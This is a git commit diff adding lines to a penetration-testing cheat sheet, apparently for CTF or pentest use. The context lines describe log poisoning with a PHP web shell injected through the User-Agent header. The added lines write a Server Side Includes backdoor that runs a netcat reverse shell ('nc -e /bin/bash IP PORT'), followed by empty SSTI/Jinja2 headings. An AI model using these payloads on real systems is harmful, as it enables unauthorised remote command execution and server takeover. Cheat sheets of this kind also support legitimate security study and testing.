Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-11-11 19:18:10 +05:00 committed by GitHub
parent 852ae7f702
commit a0512879ce
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -541,6 +541,10 @@ For apache `/var/log/apache2/access.log` try to access the log and if we can the
For niginx `/var/log/nginx/error.log` try to access the log and if we can then add `<?php system($_GET['c']); ?>` in User-agent or try to add it in a file having a paramter make sure it's not being url encoded <br/>
### SSI (Server Side Includes)
` echo '<!--#exec cmd="nc -e /bin/bash IP PORT" -->' > backdoor.shtml`
### SSTI (Server Side Template Injection)
#### Jinja2